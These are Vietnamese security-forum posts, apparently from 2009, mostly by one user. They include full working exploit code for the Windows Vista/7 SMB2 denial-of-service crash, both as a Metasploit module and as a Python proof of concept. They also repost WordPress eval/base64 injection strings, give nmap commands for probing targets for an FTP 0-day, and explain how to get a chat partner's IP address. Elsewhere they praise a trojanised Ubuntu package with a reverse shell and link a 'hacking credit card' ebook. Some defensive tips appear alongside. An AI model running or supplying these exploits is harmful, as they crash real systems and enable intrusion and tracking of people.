Messages posted by: holiganvn

@all:mấy bữa nay mình thấy trên TV quảng cáo 29/9 sẽ xuất hiện chương trình diệt virus mới,không biết là chương trình AV nào nhỉ smilie

minhthien6895 wrote:

Có anh chị nào biết cách crack WPA bằng Backtrack 3 Final ko. Em đã lên Youtube nó chỉ cặn kỹ ròi nhưng khi làm thì đến chỗ airodump thì các mạng không có data nên không hack được. Em nghe nói là do card wifi của máy không hợp với Backtrack 3. Anh chị nào cho lời chỉ dẫn em nha. Nếu đúng do card mạng thì anh chị cho em bik cái card nào là hợp nhất nha THANKS !!

vào http://forums.remote-exploit.org/ học cách sử dụng back-track đã

Mr.Kas wrote:

dang113 wrote:

Hơi lạc đề 1 tý, nhưng mình muốn hỏi xem bạn dùng hệ điều hành gì, mình nhìn thấy hơi lạ.

Mình nghĩ hệ điều hành ấy là Debian

Xem thêm thông tin tại http://vi.wikipedia.org/wiki/Debian và trên trang chủ của Debian tại http://www.debian.org/.

@Mr.Kas: bác m3onh0x84 xài kubuntu+KDE

cảm ơn bác KyNam nhiều,chương trình rất hữu ích smilie

@Mr.kas: coi cái này rồi nghĩ lại nhé,coi linux có an toàn "tuyệt đối" không smilie

----Ubuntu Package Backdoor Using Metasploit

This is a great demo by Redmeat_uk ( redmeat_uk[] hotmail [] com ) where he shows how to create a trojan using the xbomb game package. He creates the trojan by bundling a Metasploit reverse TCP stager payload with the game package. When the game is installed and executed, the Metasploit payload executes and connects back to the attacker, giving him a shell on the system. As most installations are done as root, this in most cases will end up becoming a root shell. smilie

Very creative! This is another example to show that Linux Malware can very easily be written and deployed, contrary to popular belief.

http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

@kekhocdoi: trước hết bạn upload ảnh lên 1 host như photobucket hoặc ImageShack rồi dùng tag

Code:

[img] link đến ảnh [/img]

để đưa ảnh vào diễn đàn

Mr.Kas wrote:

@ holiganvn: Đường truyền không là vấn đề khi mục đích cuối cùng của chúng ta là "bảo mật".

@Mr.kas:phần mềm tor đơn thuần chỉ là phần mềm ẩn danh trên mạng thôi,thời đại bây giời chẳng có "Phương thức liên lạc qua mạng nào an toàn" tuyệt đối cả,chỉ là tương đối thôi smilie

,ví dụ:

/hvaonline/posts/list/31037.html

theo mình nghĩ "Phương thức liên lạc qua mạng nào an toàn" nhất chính là "ý thức" và "trình độ" của mỗi người smilie

m3onh0x84 wrote:

em thấy hdd thướng bị bac block logical, bất kể là ổ sata hay ata. Cho em hỏi có loại ổ đĩa nào khả dĩ k0 bị bad block k0 ạ ? như usb. ssd,, ..... ?
Thanks anh em giúp đỡ

@m3onh0x84:chắc do cấu tạo vật lí giữa usb và hdd khác nhau smilie

http://www.ddth.com/showthread.php?t=174230

thử gỡ bỏ và cài lại bản scim-unikey mới nhất coi:

http://forum.ubuntu-vn.org/viewtopic.php?f=85&t=4307

nguyenducben wrote:

máy mình bị con virut w32.vomog.pe mình đã dùng BKAV bản mới nhất , CMC , Kaspersky mà cũng không diệt được nó
ai diệt được giúp mình cái thank

vui lòng đưa log HijackThis lên

http://go.trendmicro.com/free-tools/hijackthis/HijackThisInstaller.exe

http://free.antivirus.com/imperia/md/content/us/trendwatch/freetools/faq_hijackthis_061509.pdf

Jino_Hoang wrote:

Các bác đow về xem thử. Phiên bản này chú trọng đến khai thác PHP và MySQL.

http://rapidshare.com/files/280112519/Ebook_Hacking_Credit_Card_Version_4_-_Hieupc.pdf

Dow nhanh không link nó chết.

@Jino_Hoang: có thể cho mình xin thêm mấy cuốn về căn bản PHP và SQL được không smilie

Jino_Hoang wrote:

Các bác đow về xem thử. Phiên bản này chú trọng đến khai thác PHP và MySQL.

http://rapidshare.com/files/280112519/Ebook_Hacking_Credit_Card_Version_4_-_Hieupc.pdf

Dow nhanh không link nó chết.

@Jino_Hoang: có thể cho mình xin thêm mấy cuốn về căn bản PHP và SQL được không smilie

@dangkiday: bác không thấy "phân mục" :Người tìm việc - việc tìm người à smilie

/hvaonline/forums/show/44.html

mã khai thác để thêm vào metasploit:

Code:

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary:: Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Vista SMB 0-day DoS
'Description' => %q{
This module exploits an "unknown" vulnerability in the SMB service on windows. (port 445) Ported by MaXe <a href="mailto:security@intern0t.net">security@intern0t.net</a>
},
'Author' => [ 'MaXe, credits to: Laurent Gaffié' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'url', 'http://pentestit.com/2009/09/08/windows-vista-smb-remote-request-day' ],
],
'DisclosureDate' => 'Sep 08 2009
register_options(
[
Opt::RPORT(445),
],
self.class)
end
def run
connect
buf1 = "\x00\x00\x00\x90"
buf2 = "\xff\x53\x4d\x42"
buf3 = "\x72\x00\x00\x00"
buf4 = "\x00\x18\x53\xc8"
buf5 = "\x00\x26"
dos = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00"
sploit = buf1
sploit << buf2
sploit << buf3
sploit << buf4
sploit << buf5
sploit << dos
sock.put(sploit)
disconnect
end
end

http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx

This program exploits an SMB2 protocol flaw utilizing a vulnerability first discovered by Laurent Gaffié. Tested to crash MS Windows Vista SP2 and MS Windows Server 2008 R2 with file sharing enabled. This code will cause such systems to display the "Blue Screen of Death" followed by a less-than-graceful reboot.

http://www.procyonlabs.com/software/smb2_bsoder/

@lacazizi:bác cẩn thận kẻo bị ban nick,leech bài từ VBF thì nên ghi rõ tác giả và nơi xuất xứ của nó smilie

,gì chứ vài 3 cái tool này khó qua mặt kaspersky lắm smilie

trình độ em còn thấp,chỉ muồn trình bày thế này smilie

:

Giao thức Internet hay một địa chỉ IP được sử dụng bởi một người để kết nối internet. Giao thức Internet cũng có những thông tin về địa điểm mà người là vẫn và kết nối với internet. Nếu là người mình kết nối internet không sử dụng proxy, chúng ta có thể theo dõi vị trí của họ hoặc nước của họ bằng cách biết IP của mình (Địa chỉ Giao thức Internet). Địa chỉ Giao thức Internet đôi khi cũng có thể theo dõi các thành phố nơi mà các vị trí người mà người mình theo dõi.

bước đầu tiên mà chúng ta muốn lấy IP của người chat VIA yahoo messenger thì chúng ta phải có được 1 tin nhắn,PM,hoặc gửi 1 file đến người bạn muốn lấy IP

trong winxp:

--vào Start>> Run>> cmd>> Enter

--sau đó type câu lệnh "netstat-n" hay "netstat-a"

--Bạn sẽ thấy thông tin theo danh sách hoạt động kết nối của Proto, Local Address, Foreign Address và State.

--Các hoạt động kết nối cho thấy các kết nối đang được kết nối với máy tính của bạn. Proto hiển thị các giao thức bạn sử dụng . Local Address dùng để chỉ Giao thức Internet của bạn kết nối mạng LAN. Foreign Address chỉ Giao thức Internet cho biết kết nối kết nối với bạn và cổng mà họ sử dụng.

--Bây giờ bạn chỉ phải tìm kiếm một cổng từ xa mà được sử dụng theo Foreign Address. Thường cổng 80 hoặc 81 được sử dụng để chuyển một tập tin. Cảng 5.050 được sử dụng cho tin nhắn. Và cổng 5.100 được sử dụng cho web cam. Và cổng 5.000 hoặc 5.001 được sử dụng để chat voice.

--Địa chỉ IP của PM không phải là IP thực sự của người mà bạn muốn lấy địa chỉ IP. Nó thuộc về yahoo server IP. Nhưng nếu bạn gửi một tập tin hoặc nhận một web cam, bạn sẽ có được một địa chỉ IP thực của bạn bè của bạn vì yahoo sử dụng Peer to Peer để kết nối với dịch vụ tiện ích này

kết

Nếu bạn muốn có một cách tốt hơn để có được Internet Protocol của người mà bạn muốn lấy địa chỉ IP, có rất nhiều phần mềm được thiết kế và phát triển để có được địa chỉ IP. Một trong những phần mềm em đã từng thử nghiệm và làm việc là Sharp IP Gette.

Sharp IP Getter phát triển bởi một nhóm các Sharp Team. Bạn cũng có thể tải miễn phí phần mềm này thông qua trang web này Www.Sharp-Soft.Net hoặc wWw.Sharp-Zone.Com.

http://www.messengeroo.com/yahoo-messenger/internet-protocol/sharp-ip-getter/

có gì sai sót,mong các bác chỉ bảo thêm smilie

Mr.Kas wrote:

Bạn tham khảo cái http://vnhacker.blogspot.com/2006/11/nu-ti-l-huyremy.html xem, sẽ trả lời được các câu hỏi của bạn đặt ra.

Good luck

@Mr.kas: tor thì hay thật nhưng nó cũng sẽ kéo đường truyền internet xuống rất chậm

Jino_Hoang wrote:

Vừa rồi lỗi IIS mới này vừa được công bố nhưng chưa thấy anh em thảo luận.
Bên Microsoft chưa có bản vá , anh em thảo luận xem nên khai thác và phòng vệ thế nào đây.

có phải lỗi này không bạn:

/hvaonline/posts/list/31061.html

vikjava wrote:

Hi all

Không biết đặt tiêu đề sao cho chính xác nội dụng.

Vấn đề mình hỏi là :

Chẳng hạn mình có 2 địa chỉ kết nối đến server. Trên firefox có cách nào chỉ định khi kết nối đến đường 1 không vô được thì kết nối đường 2 hay kô.

Đường 1 chỉ định tại home default.

đề nghị Microsoft Certified Systems Engineer vikjava nói rõ hơn đi smilie

@Robbey:sao bạn gởi bài này vào box "thâm nhập",có mod nào di chuyển chủ để này vào box "thảo luận virus,trojan" để thảo luận tiếp

ở trên có đoạn code sử dụng nmap để tìm lỗi 0-day FTP,các bạn save đoạn code lại thành file.nse,lưu ở /usr/local/share/nmap/scripts/ ,sau đó sử dụng câu lệnh này để cập nhật db cho nmap:

Code:

nmap --script-updatedb

Code:

r00t@holiganvn
tarting Nmap 5.00 ( http://nmap.org ) at 2009-09-06 14:14 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using –system-dns or specify valid servers with –dns-servers
Interesting ports on 192.168.41.4:
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
MAC Address: 08:00:27:B5:C1:E9 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.53 seconds

sử dụng nmap tìm lỗi ở cổng 21

Code:

nmap -p21 --script= -host muốn tấn công-

video tấn công ,demo với back-track

http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html

http://www.quantrimang.com.vn/baomat/bao-mat/tin-bao-mat/60019_Canh_bao_ve_lo_hong_chua_va_cua_Microsoft.aspx

ai đang xài win vista/7 thì tạm thời tắt cái SMB 2.0 đi

http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm

http://security.bkis.vn

By Nguyen Cong Cuong, Senior Malware Researcher - Bkis

Tất cả những ai sử dụng WordPress phiên bản trước 2.8.4 đều gặp lỗi bảo mật này. Hãy nâng cấp phiên bản của bạn ngay bây giờ

Nếu đường dẫn cố định của bạn có một trong các chuỗi dưới đây, nhiều khả năng bạn đã bị tấn công:

Code:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

Code:

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%

Một cách khác để nhận biết là có một số thành viên lạ trong blog của bạn. Thí dụ, bạn là quản trị duy nhất, nhưng bảng điều khiển hiển thị Administrator (2).

Để khắc phục, bạn cần phải tìm và xóa các thành viên khả nghi, tìm các bài viết có chứa chuỗi “eval” và tìm sửa thủ công các url bị virus sửa đổi.

Lỗ hổng bảo mật này đã được sớm phát hiện và khắc phục trong bản 2.8.4 (ra mắt ngày 12/8).

=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------

http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html

II. BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

Code:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-------------------------
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server 2008
as it use the same SMB2.0 driver (but not tested).

VII. SOLUTION
-------------------------
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
-------------------------
http://microsoft.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

TQN wrote:

Đọc cái phần mô tả tiếng Viết này muốn méo miệng luôn, không hiểu gì cả. Dịch tự động à ?

google dịch smilie

http://www.wpbeginner.com/news/wordpress-sql-injection-latest-attack/

A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts urls will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention.

There was one of the following codes that were added to your permalink structure due to this attack:
Code:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECcode%5D))%7D%7D|.+)&%

These quotes appended all permalinks on your site and it can only be changed if removed manually.

To fix this go to:

Settings > Permalinks and remove the above code and replace your default code.

Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.

This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there.

We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon.

Also if you haven’t implement some of these measures to secure your http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/

Bạn phải chat với người bạn đang muốn lấy IP dể có sự thiết lập IP. Nói chung là giữ Online Connect với người bạn đang muốn lấy IP
Mở một cửa sổ DOS prompt Vào Cmd gõ lệnh sau:

Code:

netstat -a

Lúc dó trên màn hình sẽ xuất hiện 1 số thông tin có dạng nhu sau:

Code:

Active Connections
Proto Local Address Foreign Address State
TCP franck-a:0 0.0.0.0:0 listENiNG
TCP franck-a:1091 0.0.0.0:0 listENiNG
TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAiT
TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED

Chúng ta chỉ chú ý những dòng nào có chữ ESTABLiSHED, dó là thông báo cho sự nối kết dã duợc thiết lập với bên ngoài.Nếu chúng ta chat với nhiều nguời, chat bằng cả Yahoo Messenger nữa thì sẽ có nhiều ESTABLiSHED, do vậy chúng cần chú ý và phân biệt xem ai mới thực sự là người mình cần lấy IP của mình.

Với ví dụ trên ta thấy p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED là dáng chú ý và quan tâm cả. Còn nếu test trên máy bạn thì nó sẽ khác đi nhưnng ta chỉ cần quan tâm dến dòng tương tự nhu vậy và có ESTABLiSHED là duợc

Việc tiếp theo của chúng ta là Ping IP này dể lấy duợc IP thật của họ.Cũng ở của sổ DOS prompt này, ta gõ lệnh:

Code:

Ping p3-max35.auck.ihug.co.nz :1054 ESTABLiSHED

chúng ta không quan tâm cái này nên không cần thêm vào sau lệnh Ping

Code:

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:
Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39
Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.
Ping statistics for 209.76.151.67:
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trIP times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

209.76.151.67 chính là IP mà chúng ta cần tìm của người bạn đang muốn lấy IP dây.

Bạn nhớ khi chát với người lấy IP nên đóng tất các cửa sổ khác lại,như vậy sẽ chính xác hơn

rất có thể mạng bị nghẽn,bạn thử đăng nhập lại coi,mấy lỗi này thường xảy ra do server của yahoo bị quá tải

http://archives.free.net.ph/message/20090903.215352.6e5d3f0a.en.html <--- new bug smilie